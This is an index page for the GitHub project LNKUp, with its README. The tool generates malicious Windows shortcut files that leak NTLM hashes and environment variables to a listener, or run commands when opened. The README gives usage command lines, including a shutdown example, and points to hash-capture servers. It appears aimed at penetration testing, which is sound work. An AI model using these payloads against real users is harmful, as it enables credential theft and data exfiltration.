Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/plazmaz/lnkup
Generates malicious LNK file payloads for data exfiltration
https://github.com/plazmaz/lnkup
data-exfiltration lnk lnk-payloads microsoft ntlm payload penetration-testing pentesting security usb windows
Last synced: about 1 month ago
JSON representation
Generates malicious LNK file payloads for data exfiltration
- Host: GitHub
- URL: https://github.com/plazmaz/lnkup
- Owner: Plazmaz
- Created: 2017-08-09T16:18:07.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2017-08-21T22:58:13.000Z (over 7 years ago)
- Last Synced: 2024-11-10T03:27:10.766Z (about 1 month ago)
- Topics: data-exfiltration, lnk, lnk-payloads, microsoft, ntlm, payload, penetration-testing, pentesting, security, usb, windows
- Language: Python
- Size: 9.77 KB
- Stars: 348
- Watchers: 17
- Forks: 53
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# LNKUp
LNK Data exfiltration payload generator
---
This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.## Info
**I am not responsible for any actions you take with this tool!**
You can contact me with any questions by opening an issue, or via my Twitter, [@Plazmaz](https://www.twitter.com/Plazmaz).## Known gotchas
* This tool will not work on OSX or Linux machines. It is specifically designed to target windows.
* There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
* You will need to run a responder or [metasploit module](https://www.rapid7.com/db/modules/auxiliary/server/capture/smb) server to capture NTLM hashes.
* To capture environment variables, you'll need to run a webserver like apache, nginx, or even just [this](https://gist.github.com/Plazmaz/cafd0bd3a3a4471446cc8fe6e4f0c036)## Installation
Install requirements using
`pip install -r requirements.txt`## Usage
#### Payload types:
* NTLM
* Steals the user's NTLM hash when rendered.
* Needs listener server such as this [metasploit module](https://www.rapid7.com/db/modules/auxiliary/server/capture/smb)
* More on NTLM hashes leaking: [https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/](https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/?utm_source=github_lnkup)
* Example usage:
`lnkup.py --host localhost --type ntlm --output out.lnk`
* Environment
* Steals the user's environment variables.
* Examples: %PATH%, %USERNAME%, etc
* Requires variables to be set using --vars
* Example usage:
`lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk`
#### Extra:
* Use `--execute` to specify a command to run when the shortcut is double clicked
* Example:
`lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"`